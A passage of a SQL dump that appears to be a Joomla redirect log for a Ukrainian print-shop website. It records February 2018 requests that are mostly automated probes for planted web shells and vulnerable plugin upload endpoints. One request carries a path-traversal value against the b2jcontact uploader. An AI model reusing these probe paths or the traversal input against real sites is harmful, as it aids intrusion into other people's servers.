00:00:00',301),(12694,'http://ekvatorprint.com.ua/pasts.php',NULL,'http://site.ru','',2,0,'2018-02-08 13:41:43','0000-00-00 00:00:00',301),(12695,'http://ekvatorprint.com.ua/modules/img/mode.php',NULL,'http://site.ru','',2,0,'2018-02-08 13:42:29','0000-00-00 00:00:00',301),(12696,'http://ekvatorprint.com.ua/mod_config.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-08 13:44:46','0000-00-00 00:00:00',301),(12697,'http://ekvatorprint.com.ua/tmp/abc.php',NULL,'http://site.ru','',1,0,'2018-02-08 14:06:22','0000-00-00 00:00:00',301),(12698,'http://ekvatorprint.com.ua/class-wp-defaults.php',NULL,'http://site.ru','',1,0,'2018-02-08 14:29:43','0000-00-00 00:00:00',301),(12699,'http://ekvatorprint.com.ua/therm.php',NULL,'http://site.ru','',2,0,'2018-02-08 16:17:52','0000-00-00 00:00:00',301),(12700,'http://ekvatorprint.com.ua/hexhglal.php',NULL,'http://site.ru','',1,0,'2018-02-08 16:18:37','0000-00-00 00:00:00',301),(12701,'http://ekvatorprint.com.ua/libraries/joomla/access/strange.php.suspected',NULL,'http://site.ru','',2,0,'2018-02-08 16:19:54','0000-00-00 00:00:00',301),(12702,'http://ekvatorprint.com.ua/images/stories/ar.php',NULL,'http://site.ru','',2,0,'2018-02-08 16:57:39','0000-00-00 00:00:00',301),(12703,'http://ekvatorprint.com.ua/administrator/header_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-08 16:58:06','0000-00-00 00:00:00',301),(12704,'http://ekvatorprint.com.ua/c.php',NULL,'http://site.ru','',3,0,'2018-02-08 17:09:14','0000-00-00 00:00:00',301),(12705,'http://ekvatorprint.com.ua/cli/cli.php',NULL,'http://site.ru','',1,0,'2018-02-08 18:35:51','0000-00-00 00:00:00',301),(12706,'http://ekvatorprint.com.ua/media/editors/codemirror/mode/octave/putenv.php',NULL,'http://site.ru','',1,0,'2018-02-08 18:42:51','0000-00-00 00:00:00',301),(12707,'http://ekvatorprint.com.ua/cache/error.php',NULL,'http://site.ru','',1,0,'2018-02-08 19:22:50','0000-00-00 00:00:00',301),(12708,'http://ekvatorprint.com.ua/includes/img/mode.php',NULL,'http://site.ru','',1,0,'2018-02-09 01:35:08','0000-00-00 00:00:00',301),(12709,'http://ekvatorprint.com.ua/components/com_foxcontact/w.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:00:23','0000-00-00 00:00:00',301),(12710,'http://ekvatorprint.com.ua/elfinder/php/connector.php',NULL,'http://ekvatorprint.com.ua/elfinder/php/connector.php','',1,0,'2018-02-09 03:23:32','0000-00-00 00:00:00',301),(12711,'http://ekvatorprint.com.ua/components/com_finder/controllers/controllers.php',NULL,'http://site.ru','',2,0,'2018-02-09 03:45:16','0000-00-00 00:00:00',301),(12712,'http://ekvatorprint.com.ua/components/com_foxcontact/uploads/ly.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:48:45','0000-00-00 00:00:00',301),(12713,'http://ekvatorprint.com.ua/modules/mod_objects/library/object.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:49:41','0000-00-00 00:00:00',301),(12714,'http://ekvatorprint.com.ua/ajax-requests.new.php',NULL,'http://site.ru','',1,0,'2018-02-09 03:57:57','0000-00-00 00:00:00',301),(12715,'http://ekvatorprint.com.ua/administrator/components/com_media/views/media/gheds.php',NULL,'http://site.ru','',1,0,'2018-02-09 05:43:48','0000-00-00 00:00:00',301),(12716,'http://ekvatorprint.com.ua/gadsense/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-02-09 06:06:14','0000-00-00 00:00:00',301),(12717,'http://ekvatorprint.com.ua/libraries/phputf8/str_parser.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:07:06','0000-00-00 00:00:00',301),(12718,'http://ekvatorprint.com.ua/cache/404.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:09:50','0000-00-00 00:00:00',301),(12719,'http://ekvatorprint.com.ua/components/com_foxcontact/d.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:14:37','0000-00-00 00:00:00',301),(12720,'http://ekvatorprint.com.ua/plugins/captcha/admin.php',NULL,'http://site.ru','',2,0,'2018-02-09 06:16:36','0000-00-00 00:00:00',301),(12721,'http://ekvatorprint.com.ua/components/com_foxcontact/e.php',NULL,'http://site.ru','',1,0,'2018-02-09 07:28:25','0000-00-00 00:00:00',301),(12722,'http://ekvatorprint.com.ua/components/com_jooomlat/s.php',NULL,'http://site.ru','',2,0,'2018-02-09 07:45:08','0000-00-00 00:00:00',301),(12723,'http://ekvatorprint.com.ua/wp-blog-posts.php',NULL,'http://site.ru','',2,0,'2018-02-09 08:44:43','0000-00-00 00:00:00',301),(12724,'http://ekvatorprint.com.ua/modules/mod_search/updates.php',NULL,'http://site.ru','',2,0,'2018-02-09 09:33:02','0000-00-00 00:00:00',301),(12725,'http://ekvatorprint.com.ua/Babbitts.php',NULL,'http://site.ru','',2,0,'2018-02-09 10:13:35','0000-00-00 00:00:00',301),(12726,'http://ekvatorprint.com.ua/fosmanual/cache/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-09 10:23:42','0000-00-00 00:00:00',301),(12727,'http://ekvatorprint.com.ua/db-config.php',NULL,'http://site.ru','',1,0,'2018-02-09 10:26:49','0000-00-00 00:00:00',301),(12728,'http://ekvatorprint.com.ua/templates/system/template.php',NULL,'http://site.ru','',2,0,'2018-02-09 10:57:56','0000-00-00 00:00:00',301),(12729,'http://ekvatorprint.com.ua/layouts/joomla/content/info_block/bass.php',NULL,'http://site.ru','',1,0,'2018-02-09 12:42:32','0000-00-00 00:00:00',301),(12730,'http://ekvatorprint.com.ua/b.php',NULL,'http://site.ru','',4,0,'2018-02-09 16:22:54','0000-00-00 00:00:00',301),(12731,'http://ekvatorprint.com.ua/libraries/knGH.php',NULL,'http://site.ru','',1,0,'2018-02-09 16:59:40','0000-00-00 00:00:00',301),(12732,'http://ekvatorprint.com.ua/libraries/joomla/database/importer/wkism.php',NULL,'http://site.ru','',1,0,'2018-02-09 17:03:17','0000-00-00 00:00:00',301),(12733,'http://ekvatorprint.com.ua/libraries/joomla/github/extras.php',NULL,'http://site.ru','',2,0,'2018-02-09 17:47:37','0000-00-00 00:00:00',301),(12734,'http://ekvatorprint.com.ua/language/lv-LV/lv-LV.localise4.php',NULL,'http://site.ru','',1,0,'2018-02-09 17:48:01','0000-00-00 00:00:00',301),(12735,'http://ekvatorprint.com.ua/libraries/legacy/contacts.php',NULL,'http://site.ru','',1,0,'2018-02-09 17:52:13','0000-00-00 00:00:00',301),(12736,'http://ekvatorprint.com.ua/generationmap.php',NULL,'http://site.ru','',1,0,'2018-02-09 18:29:48','0000-00-00 00:00:00',301),(12737,'http://ekvatorprint.com.ua/components/com_b2jcontact/config.php',NULL,'http://site.ru','',1,0,'2018-02-09 18:37:28','0000-00-00 00:00:00',301),(12738,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.4/cache.php',NULL,'http://site.ru','',3,0,'2018-02-09 18:38:03','0000-00-00 00:00:00',301),(12739,'http://ekvatorprint.com.ua/data.php',NULL,'http://site.ru','',2,0,'2018-02-09 18:53:18','0000-00-00 00:00:00',301),(12740,'http://ekvatorprint.com.ua/libraries/simplepie/idn/idnb_convert.class.php',NULL,'http://site.ru','',2,0,'2018-02-09 20:01:21','0000-00-00 00:00:00',301),(12741,'http://ekvatorprint.com.ua/categories.php',NULL,'http://site.ru','',2,0,'2018-02-09 20:04:01','0000-00-00 00:00:00',301),(12742,'http://ekvatorprint.com.ua/plugins/editors/tinymce/version.php',NULL,'http://site.ru','',1,0,'2018-02-09 20:06:43','0000-00-00 00:00:00',301),(12743,'http://ekvatorprint.com.ua/df.php',NULL,'http://site.ru','',1,0,'2018-02-09 20:21:39','0000-00-00 00:00:00',301),(12744,'http://ekvatorprint.com.ua/components/gif.php',NULL,'http://site.ru','',2,0,'2018-02-09 23:05:10','0000-00-00 00:00:00',301),(12745,'http://ekvatorprint.com.ua/plugins/content/geshi/geshi/geshi/geshi.php',NULL,'http://site.ru','',1,0,'2018-02-09 23:08:50','0000-00-00 00:00:00',301),(12746,'http://ekvatorprint.com.ua/aul.php',NULL,'http://site.ru','',1,0,'2018-02-10 01:43:06','0000-00-00 00:00:00',301),(12747,'http://ekvatorprint.com.ua/connectors/system/settings.php',NULL,'','',1,0,'2018-02-10 03:00:34','0000-00-00 00:00:00',301),(12748,'http://ekvatorprint.com.ua/plugins/authentication/config.php',NULL,'http://site.ru','',1,0,'2018-02-10 03:05:39','0000-00-00 00:00:00',301),(12749,'http://ekvatorprint.com.ua/bin/logs.php',NULL,'http://site.ru','',1,0,'2018-02-10 03:43:30','0000-00-00 00:00:00',301),(12750,'http://ekvatorprint.com.ua/components/com_content/models/classes.php',NULL,'http://site.ru','',1,0,'2018-02-10 03:50:31','0000-00-00 00:00:00',301),(12751,'http://ekvatorprint.com.ua/modules/mod_articles_category/tmpl/defult.php',NULL,'http://site.ru','',3,0,'2018-02-10 04:03:43','0000-00-00 00:00:00',301),(12752,'http://ekvatorprint.com.ua/components/com_wrapper/views/wrapper/wrapper.php',NULL,'http://site.ru','',3,0,'2018-02-10 04:42:11','0000-00-00 00:00:00',301),(12753,'http://ekvatorprint.com.ua/wp-logout.php',NULL,'http://site.ru','',2,0,'2018-02-10 05:46:13','0000-00-00 00:00:00',301),(12754,'http://ekvatorprint.com.ua/libraries/joomla/linkedin/local.php',NULL,'http://site.ru','',1,0,'2018-02-10 06:23:48','0000-00-00 00:00:00',301),(12755,'http://ekvatorprint.com.ua/language/lv-LV/lv-LV.localise2.php',NULL,'http://site.ru','',1,0,'2018-02-10 06:29:51','0000-00-00 00:00:00',301),(12756,'http://ekvatorprint.com.ua/modules/mod_helper/mod_helper.php',NULL,'http://site.ru','',2,0,'2018-02-10 07:27:33','0000-00-00 00:00:00',301),(12757,'http://ekvatorprint.com.ua/language/en-GB/language.php',NULL,'http://site.ru','',3,0,'2018-02-10 08:09:29','0000-00-00 00:00:00',301),(12758,'http://ekvatorprint.com.ua/tmp/c2.php',NULL,'http://site.ru','',1,0,'2018-02-10 08:53:43','0000-00-00 00:00:00',301),(12759,'http://ekvatorprint.com.ua/miwed.php',NULL,'http://site.ru','',1,0,'2018-02-10 09:29:35','0000-00-00 00:00:00',301),(12760,'http://ekvatorprint.com.ua/532299.php',NULL,'http://site.ru','',1,0,'2018-02-10 09:29:41','0000-00-00 00:00:00',301),(12761,'http://ekvatorprint.com.ua/media/index.php',NULL,'http://site.ru','',1,0,'2018-02-10 13:06:42','0000-00-00 00:00:00',301),(12762,'http://ekvatorprint.com.ua/eladm.php',NULL,'http://site.ru','',1,0,'2018-02-10 14:58:19','0000-00-00 00:00:00',301),(12763,'http://ekvatorprint.com.ua/images/al.php',NULL,'http://site.ru','',1,0,'2018-02-11 12:05:06','0000-00-00 00:00:00',301),(12764,'http://ekvatorprint.com.ua/misc/jquery.once.js?v=1.2',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-15 00:17:18','0000-00-00 00:00:00',301),(12765,'http://ekvatorprint.com.ua/connectors/security/login.php',NULL,'','',1,0,'2018-02-15 05:47:43','0000-00-00 00:00:00',301),(12766,'http://ekvatorprint.com.ua/bitrix/admin/search.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-15 18:28:19','0000-00-00 00:00:00',301),(12767,'http://ekvatorprint.com.ua/rep.php',NULL,'','',1,0,'2018-02-16 07:38:21','0000-00-00 00:00:00',301),(12768,'http://ekvatorprint.com.ua/banner-printing&nb=2',NULL,'','',3,0,'2018-02-16 09:25:41','0000-00-00 00:00:00',301),(12769,'http://ekvatorprint.com.ua/plugins/vmcalculation/avalara/classes/wsdl/bcdaz.php',NULL,'http://site.ru','',2,0,'2018-02-17 12:05:18','0000-00-00 00:00:00',301),(12770,'http://ekvatorprint.com.ua/administrator/components/com_contact/views/contact/tmpl/debug.php',NULL,'http://site.ru','',4,0,'2018-02-17 13:38:33','0000-00-00 00:00:00',301),(12771,'http://ekvatorprint.com.ua/administrator/components/com_categories/views/category/tund.php',NULL,'http://site.ru','',2,0,'2018-02-17 16:09:08','0000-00-00 00:00:00',301),(12772,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_contact/sky.php',NULL,'http://site.ru','',1,0,'2018-02-17 16:12:11','0000-00-00 00:00:00',301),(12773,'http://ekvatorprint.com.ua/consystem.php',NULL,'','',4,0,'2018-02-18 03:45:26','0000-00-00 00:00:00',301),(12774,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../common.php',NULL,'','',1,0,'2018-02-18 05:32:59','0000-00-00 00:00:00',301),(12775,'http://ekvatorprint.com.ua/modules/mod_k2_comment.php',NULL,'http://site.ru','',4,0,'2018-02-18 08:33:52','0000-00-00 00:00:00',301),(12776,'http://ekvatorprint.com.ua/logs/old_log.php',NULL,'http://site.ru','',1,0,'2018-02-18 08:35:07','0000-00-00 00:00:00',301),(12777,'http://ekvatorprint.com.ua/includes/configurati0n.php',NULL,'http://site.ru','',1,0,'2018-02-18 09:17:14','0000-00-00 00:00:00',301),(12778,'http://ekvatorprint.com.ua/components/com_support/support.php',NULL,'http://site.ru','',1,0,'2018-02-18 09:29:41','0000-00-00 00:00:00',301),(12779,'http://ekvatorprint.com.ua/logs/errors.php',NULL,'http://site.ru','',1,0,'2018-02-18 09:45:52','0000-00-00 00:00:00',301),(12780,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/fullpage/langs/langs.php',NULL,'http://site.ru','',1,0,'2018-02-18 10:02:45','0000-00-00 00:00:00',301),(12781,'http://ekvatorprint.com.ua/old_index.php',NULL,'http://site.ru','',2,0,'2018-02-18 10:52:45','0000-00-00 00:00:00',301),(12782,'http://ekvatorprint.com.ua/modules/mod_footer/tmpl/site.php',NULL,'http://site.ru','',2,0,'2018-02-18 10:53:15','0000-00-00 00:00:00',301),(12783,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/o2k7.php',NULL,'http://site.ru','',2,0,'2018-02-18 11:31:39','0000-00-00 00:00:00',301),(12784,'http://ekvatorprint.com.ua/cache/cleanup.php',NULL,'http://site.ru','',1,0,'2018-02-18 13:51:45','0000-00-00 00:00:00',301),(12785,'http://ekvatorprint.com.ua/administrator/components/com_wusers/wusers.php',NULL,'http://site.ru','',5,0,'2018-02-18 14:02:35','0000-00-00 00:00:00',301),(12786,'http://ekvatorprint.com.ua/templates/beez5/css/css.php',NULL,'http://site.ru','',2,0,'2018-02-18 15:54:51','0000-00-00 00:00:00',301),(12787,'http://ekvatorprint.com.ua/cache/sok/s.php',NULL,'http://site.ru','',2,0,'2018-02-18 15:55:22','0000-00-00 00:00:00',301),(12788,'http://ekvatorprint.com.ua/wp-auto.php',NULL,'http://site.ru','',1,0,'2018-02-18 15:58:04','0000-00-00 00:00:00',301),(12789,'http://ekvatorprint.com.ua/wp-auto.php',NULL,'http://site.ru','',1,0,'2018-02-18 15:58:04','0000-00-00 00:00:00',301),(12790,'http://ekvatorprint.com.ua/media/media/default.php',NULL,'http://site.ru','',2,0,'2018-02-18 16:27:46','0000-00-00 00:00:00',301),(12791,'http://ekvatorprint.com.ua/libraries/phpmailer/pop.php',NULL,'http://site.ru','',1,0,'2018-02-18 16:58:54','0000-00-00 00:00:00',301),(12792,'http://ekvatorprint.com.ua/function-sync.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-18 17:28:12','0000-00-00 00:00:00',301),(12793,'http://ekvatorprint.com.ua/plugins/editors/tinymce/templates/xml.php',NULL,'http://site.ru','',1,0,'2018-02-18 17:34:08','0000-00-00 00:00:00',301),(12794,'http://ekvatorprint.com.ua/components/com_foxcontact/532245123100.php',NULL,'http://site.ru','',1,0,'2018-02-18 17:58:11','0000-00-00 00:00:00',301),(12795,'http://ekvatorprint.com.ua/libraries/joomla/database/bclass.php?c=md5&f=2343534',NULL,'ekvatorprint.com.ua','',1,0,'2018-02-20 10:05:54','0000-00-00 00:00:00',301),(12796,'http://ekvatorprint.com.ua/bubus.php',NULL,'http://site.ru','',2,0,'2018-02-20 10:48:41','0000-00-00 00:00:00',301),(12797,'http://ekvatorprint.com.ua/components/com_finder/models/models.php',NULL,'http://site.ru','',2,0,'2018-02-20 13:18:58','0000-00-00 00:00:00',301),(12798,'http://ekvatorprint.com.ua/cool.php',NULL,'http://site.ru','',2,0,'2018-02-20 14:12:33','0000-00-00 00:00:00',301),(12799,'http://ekvatorprint.com.ua/XaaCvSnEJlud3z1McIwCwKkpu',NULL,'http://ekvatorprint.com.ua/XaaCvSnEJlud3z1McIwCwKkpu','',1,0,'2018-02-20 17:38:25','0000-00-00 00:00:00',301),(12800,'http://ekvatorprint.com.ua/gg.php',NULL,'http://site.ru','',1,0,'2018-02-20 19:18:31','0000-00-00 00:00:00',301),(12801,'http://ekvatorprint.com.ua/hipay/popup-pomo.php',NULL,'http://site.ru','',4,0,'2018-02-21 03:28:29','0000-00-00 00:00:00',301),(12802,'http://ekvatorprint.com.ua/kadvl.php',NULL,'http://site.ru','',2,0,'2018-02-21 03:52:21','0000-00-00 00:00:00',301),(12803,'http://ekvatorprint.com.ua/administrator/cache/bgeiis.php',NULL,'http://site.ru','',2,0,'2018-02-21 07:51:33','0000-00-00 00:00:00',301),(12804,'http://ekvatorprint.com.ua/homefeatured/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-02-21 08:21:19','0000-00-00 00:00:00',301),(12805,'http://ekvatorprint.com.ua/administrator/components/com_contenthistory/views/preview/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2018-02-21 09:42:29','0000-00-00 00:00:00',301),(12806,'http://ekvatorprint.com.ua/administrator/components/com_installer/views/languages/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2018-02-21 11:50:41','0000-00-00 00:00:00',301),(12807,'http://ekvatorprint.com.ua/ciosans.php',NULL,'http://site.ru','',1,0,'2018-02-21 14:07:00','0000-00-00 00:00:00',301),(12808,'http://ekvatorprint.com.ua/cli/css.php',NULL,'http://site.ru','',1,0,'2018-02-21 16:16:20','0000-00-00 00:00:00',301),(12809,'http://ekvatorprint.com.ua/aa.php',NULL,'http://site.ru','',3,0,'2018-02-21 16:45:56','0000-00-00 00:00:00',301),(12810,'http://ekvatorprint.com.ua/cli/headers_img.php.suspected',NULL,'http://site.ru','',3,0,'2018-02-21 19:55:20','0000-00-00 00:00:00',301),(12811,'http://ekvatorprint.com.ua/mail/logo_img.php',NULL,'http://site.ru','',1,0,'2018-02-21 20:20:05','0000-00-00 00:00:00',301),(12812,'http://ekvatorprint.com.ua/fianetfraud/popup-pomo.php',NULL,'http://site.ru','',4,0,'2018-02-21 22:31:47','0000-00-00 00:00:00',301),(12813,'http://ekvatorprint.com.ua/jemobile.php',NULL,'http://site.ru','',1,0,'2018-02-21 22:37:26','0000-00-00 00:00:00',301),(12814,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/fullscreen/htaccess.php',NULL,'http://site.ru','',2,0,'2018-02-22 00:43:24','0000-00-00 00:00:00',301),(12815,'http://ekvatorprint.com.ua/mixi.php',NULL,'http://site.ru','',1,0,'2018-02-22 00:55:27','0000-00-00 00:00:00',301),(12816,'http://ekvatorprint.com.ua/far.php',NULL,'','',1,0,'2018-02-22 01:53:48','0000-00-00 00:00:00',301),(12817,'http://ekvatorprint.com.ua/Eouds.php',NULL,'http://site.ru','',1,0,'2018-02-22 04:56:24','0000-00-00 00:00:00',301),(12818,'http://ekvatorprint.com.ua/Gfedew.php',NULL,'http://site.ru','',2,0,'2018-02-22 04:57:21','0000-00-00 00:00:00',301),(12819,'http://ekvatorprint.com.ua/Sherwoods.php',NULL,'http://site.ru','',1,0,'2018-02-22 08:46:00','0000-00-00 00:00:00',301),(12820,'http://ekvatorprint.com.ua/wp-wpphp.php',NULL,'http://site.ru','',7,0,'2018-02-22 08:46:38','0000-00-00 00:00:00',301),(12821,'http://ekvatorprint.com.ua/templates/jblank/html/com_newsfeeds/newsfeed/newsfeed.php',NULL,'http://site.ru','',2,0,'2018-02-22 09:18:57','0000-00-00 00:00:00',301),(12822,'http://ekvatorprint.com.ua/templates/atomic/html/mod_custom/mod_custom.php',NULL,'http://site.ru','',1,0,'2018-02-22 09:58:06','0000-00-00 00:00:00',301),(12823,'http://ekvatorprint.com.ua/templates/atomic/css/blueprint/plugins/link-icons/icons/icons.php',NULL,'http://site.ru','',1,0,'2018-02-22 10:26:14','0000-00-00 00:00:00',301),(12824,'http://ekvatorprint.com.ua/templates/jblank/html/mod_users_latest/mod_users_latest.php',NULL,'http://site.ru','',2,0,'2018-02-22 10:27:22','0000-00-00 00:00:00',301),(12825,'http://ekvatorprint.com.ua/templates/jblank/html/mod_footer/mod_footer.php',NULL,'http://site.ru','',1,0,'2018-02-22 10:27:51','0000-00-00 00:00:00',301),(12826,'http://ekvatorprint.com.ua/templates/jblank/html/mod_search/mod_search.php',NULL,'http://site.ru','',1,0,'2018-02-22 10:30:24','0000-00-00 00:00:00',301),(12827,'http://ekvatorprint.com.ua/templates/atomic/css/blueprint/plugins/buttons/icons/icons.php',NULL,'http://site.ru','',2,0,'2018-02-22 10:33:02','0000-00-00 00:00:00',301),(12828,'http://ekvatorprint.com.ua/wp-xmlrpc.php',NULL,'http://site.ru','',2,0,'2018-02-22 11:33:18','0000-00-00 00:00:00',301),(12829,'http://ekvatorprint.com.ua/modules/mod_stats/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-22 12:26:20','0000-00-00 00:00:00',301),(12830,'http://ekvatorprint.com.ua/templates/jblank/img/images/prettyPhoto/dark_rounded/dark_rounded.php',NULL,'http://site.ru','',2,0,'2018-02-22 12:28:26','0000-00-00 00:00:00',301),(12831,'http://ekvatorprint.com.ua/statslive/popup-pomo.php',NULL,'http://site.ru','',5,0,'2018-02-22 12:29:26','0000-00-00 00:00:00',301),(12832,'http://ekvatorprint.com.ua/ws0.php',NULL,'http://site.ru','',2,0,'2018-02-22 12:30:40','0000-00-00 00:00:00',301),(12833,'http://ekvatorprint.com.ua/templates/atomic/cutia.php',NULL,'http://site.ru','',1,0,'2018-02-22 13:05:33','0000-00-00 00:00:00',301),(12834,'http://ekvatorprint.com.ua/termsa/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-22 14:53:57','0000-00-00 00:00:00',301),(12835,'http://ekvatorprint.com.ua/plugins/header_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-22 14:58:48','0000-00-00 00:00:00',301),(12836,'http://ekvatorprint.com.ua/templates/jblank/language/ru-RU/ru-RU.php',NULL,'http://site.ru','',1,0,'2018-02-22 15:04:23','0000-00-00 00:00:00',301),(12837,'http://ekvatorprint.com.ua/templates/jblank/html/com_mailto/mailto/mailto.php',NULL,'http://site.ru','',2,0,'2018-02-22 15:30:30','0000-00-00 00:00:00',301),(12838,'http://ekvatorprint.com.ua/mondialrelay/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-02-22 16:12:43','0000-00-00 00:00:00',301),(12839,'http://ekvatorprint.com.ua/templates/bvqfmgz.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-22 16:22:41','0000-00-00 00:00:00',301),(12840,'http://ekvatorprint.com.ua/templates/beez_20/images/nature/nature.php',NULL,'http://site.ru','',2,0,'2018-02-22 16:47:38','0000-00-00 00:00:00',301),(12841,'http://ekvatorprint.com.ua/xmlrpc/system_infos.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-22 18:29:45','0000-00-00 00:00:00',301),(12842,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-videogallery/upload.php',NULL,'','',2,0,'2018-02-22 19:59:22','0000-00-00 00:00:00',301),(12843,'http://ekvatorprint.com.ua/wp-content/plugins/mailpress/mp-includes/action.php',NULL,'','',1,0,'2018-02-22 19:59:24','0000-00-00 00:00:00',301),(12844,'http://ekvatorprint.com.ua/wp-content/plugins/wpstorecart/php/upload.php',NULL,'','',1,0,'2018-02-22 19:59:50','0000-00-00 00:00:00',301),(12845,'http://ekvatorprint.com.ua/modules/fieldvmegamenu/ajax/upload.php',NULL,'','',1,0,'2018-02-22 20:00:20','0000-00-00 00:00:00',301),(12846,'http://ekvatorprint.com.ua/wp-content/plugins/sharexy/ajaxresponder.php',NULL,'','',1,0,'2018-02-22 20:00:44','0000-00-00 00:00:00',301),(12847,'http://ekvatorprint.com.ua/wp-content/plugins/page-google-maps/pr.php',NULL,'','',1,0,'2018-02-22 20:01:05','0000-00-00 00:00:00',301),(12848,'http://ekvatorprint.com.ua/wp-admin/plugin-editor.php?file=userpro/functions/_trial.php&plugin=userpro/index.php',NULL,'','',2,0,'2018-02-22 20:03:53','0000-00-00 00:00:00',301),(12849,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-portfolio/upload.php',NULL,'','',1,0,'2018-02-22 20:06:42','0000-00-00 00:00:00',301),(12850,'http://ekvatorprint.com.ua/templates/beez3/css/Marvins.php',NULL,'http://site.ru','',20,0,'2018-02-22 20:07:24','0000-00-00 00:00:00',301),(12851,'http://ekvatorprint.com.ua/templates/jblank/html/mod_weblinks/mod_weblinks.php',NULL,'http://site.ru','',3,0,'2018-02-22 20:11:01','0000-00-00 00:00:00',301),(12852,'http://ekvatorprint.com.ua/templates/jblank/html/com_users/reset/reset.php',NULL,'http://site.ru','',1,0,'2018-02-22 21:42:22','0000-00-00 00:00:00',301),(12853,'http://ekvatorprint.com.ua/phpmyadmin/syijg.php',NULL,'http://site.ru','',2,0,'2018-02-22 21:42:34','0000-00-00 00:00:00',301),(12854,'http://ekvatorprint.com.ua/templates/atomic/css/blueprint/src/src.php',NULL,'http://site.ru','',4,0,'2018-02-22 22:36:16','0000-00-00 00:00:00',301),(12855,'http://ekvatorprint.com.ua/modules/mod_users_latest/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-22 22:51:56','0000-00-00 00:00:00',301),(12856,'http://ekvatorprint.com.ua/sizings.php',NULL,'http://site.ru','',2,0,'2018-02-22 22:52:52','0000-00-00 00:00:00',301),(12857,'http://ekvatorprint.com.ua/templates/jblank/html/com_content/form/form.php',NULL,'http://site.ru','',2,0,'2018-02-22 22:54:29','0000-00-00 00:00:00',301),(12858,'http://ekvatorprint.com.ua/templates/jblank/img/images/prettyPhoto/dark_square/dark_square.php',NULL,'http://site.ru','',1,0,'2018-02-22 23:29:21','0000-00-00 00:00:00',301),(12859,'http://ekvatorprint.com.ua/plugins/captcha/captcha.php',NULL,'http://site.ru','',1,0,'2018-02-22 23:31:01','0000-00-00 00:00:00',301),(12860,'http://ekvatorprint.com.ua/modules/mod_articles_categories/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-22 23:57:14','0000-00-00 00:00:00',301),(12861,'http://ekvatorprint.com.ua/modules/mod_itpgads_9722/plugins.php',NULL,'http://site.ru','',1,0,'2018-02-23 00:26:32','0000-00-00 00:00:00',301),(12862,'http://ekvatorprint.com.ua/templates/beez5/html/html.php',NULL,'http://site.ru','',2,0,'2018-02-23 00:55:41','0000-00-00 00:00:00',301),(12863,'http://ekvatorprint.com.ua/templates/jblank/html/com_contact/com_contact.php',NULL,'http://site.ru','',1,0,'2018-02-23 00:56:51','0000-00-00 00:00:00',301),(12864,'http://ekvatorprint.com.ua/templates/atomic/atomic.php',NULL,'http://site.ru','',1,0,'2018-02-23 02:28:18','0000-00-00 00:00:00',301),(12865,'http://ekvatorprint.com.ua/nsecures.php',NULL,'http://site.ru','',2,0,'2018-02-23 02:48:29','0000-00-00 00:00:00',301),(12866,'http://ekvatorprint.com.ua/tmp/r.php',NULL,'http://site.ru','',1,0,'2018-02-23 02:53:25','0000-00-00 00:00:00',301),(12867,'http://ekvatorprint.com.ua/templates/beez5/html/com_content/categories/categories.php',NULL,'http://site.ru','',3,0,'2018-02-23 03:20:56','0000-00-00 00:00:00',301),(12868,'http://ekvatorprint.com.ua/templates/beez5/javascript/javascript.php',NULL,'http://site.ru','',1,0,'2018-02-23 04:46:49','0000-00-00 00:00:00',301),(12869,'http://ekvatorprint.com.ua/modules/mod_wrapper/tmpl/tmpl.php',NULL,'http://site.ru','',1,0,'2018-02-23 05:37:06','0000-00-00 00:00:00',301),(12870,'http://ekvatorprint.com.ua/modules/mod_articles_news/media-views-rtl.php',NULL,'http://site.ru','',3,0,'2018-02-23 05:48:31','0000-00-00 00:00:00',301),(12871,'http://ekvatorprint.com.ua/templates/jblank/img/images/prettyPhoto/light_square/light_square.php',NULL,'http://site.ru','',1,0,'2018-02-23 06:39:54','0000-00-00 00:00:00',301),(12872,'http://ekvatorprint.com.ua/phpMyAdmin/logo_img.php',NULL,'http://site.ru','',1,0,'2018-02-23 07:29:22','0000-00-00 00:00:00',301),(12873,'http://ekvatorprint.com.ua/templates/jblank/html/mod_banners/mod_banners.php',NULL,'http://site.ru','',1,0,'2018-02-23 07:36:29','0000-00-00 00:00:00',301),(12874,'http://ekvatorprint.com.ua/wolf.php',NULL,'http://site.ru','',2,0,'2018-02-23 08:32:43','0000-00-00 00:00:00',301),(12875,'http://ekvatorprint.com.ua/modules/mod_yoo_gallery/yoo_gallery/lib/debug.php',NULL,'http://site.ru','',1,0,'2018-02-23 08:33:11','0000-00-00 00:00:00',301),(12876,'http://ekvatorprint.com.ua/templates/atomic/css/blueprint/plugins/link-icons/link-icons.php',NULL,'http://site.ru','',1,0,'2018-02-23 08:53:47','0000-00-00 00:00:00',301),(12877,'http://ekvatorprint.com.ua/templates/nulag.php',NULL,'http://site.ru','',2,0,'2018-02-23 10:48:37','0000-00-00 